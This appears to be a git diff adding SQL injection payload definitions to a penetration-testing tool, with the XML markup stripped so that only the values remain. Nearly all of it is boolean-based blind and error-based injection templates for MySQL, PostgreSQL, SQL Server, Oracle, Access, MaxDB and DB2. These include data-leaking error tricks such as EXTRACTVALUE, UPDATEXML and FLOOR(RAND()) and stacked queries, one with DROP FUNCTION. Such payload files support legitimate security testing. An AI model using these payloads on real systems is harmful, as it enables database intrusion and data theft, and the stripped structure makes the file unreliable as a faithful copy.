[RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + +
+ MySQL + >= 5.0 +
+
+ + + MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value) + 1 + 3 + 1 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + +
+ MySQL + >= 5.0 +
+
+ + + MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause + 1 + 3 + 1 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + +
+ MySQL + < 5.0 +
+
+ + + MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value) + 1 + 4 + 1 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + +
+ MySQL + < 5.0 +
+
+ + + PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause + 1 + 2 + 1 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/(SELECT 0) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END)) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END)) + +
+ PostgreSQL +
+
+ + + + PostgreSQL boolean-based blind - ORDER BY clause (original value) + 1 + 4 + 1 + 3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) + +
+ PostgreSQL +
+
+ + + + + PostgreSQL boolean-based blind - ORDER BY clause (GENERATE_SERIES) + 1 + 5 + 1 + + 3 + 1 + ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1) + + ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1) + + + ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1) + +
+ PostgreSQL +
+
+ + + Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause + 1 + 3 + 1 + 3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (original value) + 1 + 4 + 1 + 3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + +
+ Microsoft SQL Server + Sybase +
+
+ + + Oracle boolean-based blind - ORDER BY, GROUP BY clause + 1 + 3 + 1 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + +
+ Oracle +
+
+ + + Oracle boolean-based blind - ORDER BY, GROUP BY clause (original value) + 1 + 4 + 1 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + +
+ Oracle +
+
+ + + Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause + 1 + 4 + 1 + 2,3 + 1 + ,IIF([INFERENCE],1,1/0) + + ,IIF([RANDNUM]=[RANDNUM],1,1/0) + + + ,IIF([RANDNUM]=[RANDNUM1],1,1/0) + +
+ Microsoft Access +
+
+ + + Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause (original value) + 1 + 5 + 1 + 2,3 + 1 + ,IIF([INFERENCE],[ORIGVALUE],1/0) + + ,IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0) + + + ,IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0) + +
+ Microsoft Access +
+
+ + + SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause + 1 + 4 + 1 + 2,3 + 1 + ,(CASE WHEN [INFERENCE] THEN 1 ELSE NULL END) + + ,(CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END) + + + ,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END) + +
+ SAP MaxDB +
+
+ + + SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause (original value) + 1 + 5 + 1 + 2,3 + 1 + ,(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END) + + ,(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END) + + + ,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END) + +
+ SAP MaxDB +
+
+ + + IBM DB2 boolean-based blind - ORDER BY clause + 1 + 4 + 1 + 3 + 1 + ,(SELECT CASE WHEN [INFERENCE] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) + + ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) + + + ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) + +
+ IBM DB2 +
+
+ + + IBM DB2 boolean-based blind - ORDER BY clause (original value) + 1 + 5 + 1 + 3 + 1 + ,(SELECT CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) + + ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) + + + ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) + +
+ IBM DB2 +
+
+ + + + HAVING boolean-based blind - WHERE, GROUP BY clause + 1 + 3 + 1 + 1,2 + 1 + HAVING [INFERENCE] + + HAVING [RANDNUM]=[RANDNUM] + + + HAVING [RANDNUM]=[RANDNUM1] + + + + + + + MySQL >= 5.0 boolean-based blind - Stacked queries + 1 + 4 + 1 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) + + ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) + # + + + ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) + +
+ MySQL + >= 5.0 +
+
+ + + MySQL < 5.0 boolean-based blind - Stacked queries + 1 + 5 + 1 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) + + ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) + # + + + ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) + +
+ MySQL + < 5.0 +
+
+ + + PostgreSQL boolean-based blind - Stacked queries + 1 + 3 + 1 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) + + ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) + -- + + + ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) + +
+ PostgreSQL +
+
+ + + + PostgreSQL boolean-based blind - Stacked queries (GENERATE_SERIES) + 1 + 5 + 1 + 1-8 + 1 + ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1 + + ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1 + -- + + + ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1 + +
+ PostgreSQL +
+
+ + + Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF) + 1 + 3 + 1 + 1-8 + 1 + ;IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] + + ;IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] + -- + + + ;IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase boolean-based blind - Stacked queries + 1 + 4 + 1 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END) + + ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END) + -- + + + ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END) + +
+ Microsoft SQL Server + Sybase +
+
+ + + Oracle boolean-based blind - Stacked queries + 1 + 4 + 1 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL + + ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL + -- + + + ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL + +
+ Oracle +
+
+ + + Microsoft Access boolean-based blind - Stacked queries + 1 + 5 + 1 + 1-8 + 1 + ;IIF([INFERENCE],1,1/0) + + ;IIF([RANDNUM]=[RANDNUM],1,1/0) + %16 + + + ;IIF([RANDNUM]=[RANDNUM1],1,1/0) + +
+ Microsoft Access +
+
+ + + SAP MaxDB boolean-based blind - Stacked queries + 1 + 5 + 1 + 1-8 + 1 + ;SELECT CASE WHEN [INFERENCE] THEN 1 ELSE NULL END FROM DUAL + + ;SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END FROM DUAL + -- + + + ;SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END FROM DUAL + +
+ SAP MaxDB +
+
+ +
diff --git a/data/xml/payloads/error_based.xml b/data/xml/payloads/error_based.xml new file mode 100644 index 00000000000..3023df9fba8 --- /dev/null +++ b/data/xml/payloads/error_based.xml @@ -0,0 +1,1538 @@ + + + + + + MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) + 2 + 1 + 1 + 1,2,3,8,9 + 1 + AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) + + + AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.1 +
+
+ + + MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) + 2 + 1 + 3 + 1,2,3,8,9 + + 1 + OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) + + + OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.1 +
+
+ + + MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) + 2 + 2 + 1 + 1,2,3,8,9 + 1 + AND GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM]) + + AND GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM]) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.6 +
+
+ + + MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET) + 2 + 2 + 3 + 1,8,9 + 1 + OR GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM]) + + OR GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM]) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.6 +
+
+ + + MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED) + 2 + 4 + 1 + 1,2,3,8,9 + 1 + AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610))) + + + AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610))) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.5 +
+
+ + + + MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED) + 2 + 4 + 3 + 1,8,9 + 1 + OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610))) + + + OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610))) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.5 +
+
+ + + MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP) + 2 + 4 + 1 + 1,2,3,8,9 + 1 + AND EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x)) + + AND EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x)) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.5 +
+
+ + + MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP) + 2 + 4 + 3 + 1,8,9 + 1 + OR EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x)) + + OR EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x)) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.5 +
+
+ + + MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS) + 2 + 5 + 1 + 1,2,3,8,9 + 1 + AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8))) + + AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8))) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.7.8 +
+
+ + + + MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS) + 2 + 5 + 3 + 1,8,9 + 1 + OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8))) + + OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8))) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.7.8 +
+
+ + + MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + 2 + 4 + 1 + 1,2,3,8,9 + 1 + AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) + + + AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.0 +
+
+ + + MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + 2 + 4 + 3 + 1,2,3,8,9 + + 1 + OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) + + + OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.0 +
+
+ + + MySQL >= 5.0 (inline) error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + 2 + 5 + 1 + 7 + 1 + (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) + + (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.0 +
+
+ + + MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML) + 2 + 3 + 1 + 1,2,3,8,9 + 1 + AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]) + + + AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1]) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.1 +
+
+ + + MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML) + 2 + 3 + 3 + 1,2,3,8,9 + + 1 + OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]) + + + OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1]) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.1 +
+
+ + + MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + 2 + 5 + 1 + 1,2,3,8,9 + 1 + AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x) + + + AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 4.1 +
+
+ + + + MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR) + 2 + 5 + 3 + 1,8,9 + 1 + OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x) + + + OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 4.1 +
+
+ + + + MySQL OR error-based - WHERE or HAVING clause (FLOOR) + 2 + 5 + 3 + 1,8,9 + 2 + OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0) + + OR 1 GROUP BY CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0) + # + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL +
+
+ + + PostgreSQL AND error-based - WHERE or HAVING clause + 2 + 1 + 1 + 1,8,9 + 1 + AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC) + + AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ PostgreSQL +
+
+ + + PostgreSQL OR error-based - WHERE or HAVING clause + 2 + 1 + 3 + 1,8,9 + 2 + OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC) + + OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ PostgreSQL +
+
+ + + Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN) + 2 + 1 + 1 + 1,8,9 + 1 + AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) + + AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN) + 2 + 2 + 3 + 1,8,9 + 2 + OR [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) + + OR [RANDNUM] IN (SELECT ('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase +
+
